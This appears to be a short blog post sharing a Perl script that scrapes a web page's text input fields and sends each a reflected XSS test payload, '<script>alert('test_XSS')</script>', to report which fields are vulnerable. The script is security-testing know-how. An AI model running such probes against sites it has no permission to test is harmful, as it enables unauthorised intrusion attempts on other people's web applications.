Today I wrote a simple perl script to automatically discover XSS vulnerabilities into a web application.
This script can be improved in order to make it more suitable to be used in a web penetration test.
Following the code:
This script can be improved in order to make it more suitable to be used in a web penetration test.
Following the code:
#!/usr/bin/perl
use strict;
use LWP::Simple;
my ($url, $webpage, @webpage, @name, $result);
if(@ARGV < 1) {
usage();
}
#Get web page specified by cmd
$webpage = get("http://" . $ARGV[0]);
#Split variable into an arry
@webpage = split(/\n/, $webpage);
#Parsing Web Page to obtain names of "input type=text"
foreach (@webpage) {
if($_ =~ /input\stype="text"\sname="(\w{1,30})"/) {
push(@name, $1);
}
}
#Print found search box
if(@name) {
print "I've found the following search box:\n";
foreach (@name) {
print "$_\n";
}
print "and I've discovered that:\n";
#Automatically exploit search box to verify XSS vulnerabilities
foreach (@name) {
$result = get("http://" . $ARGV[0] . "?" . $_ . "=<script>alert('test_XSS')</script>");
if($result =~ /<script>alert\('test_XSS'\)<\/script>/) {
print "$_ is vulnerable to XSS\n";
}
else { print "$_ isn't vulnerable to XSS\n";}
}
}
else {
print"I have not found search boxes in " . $ARGV[0] . "\n";
}
sub usage() {
print"Usage: ".$0." <url>\n";
print "Example: " . $0 . " ivanobinetti.com\n";
exit;
}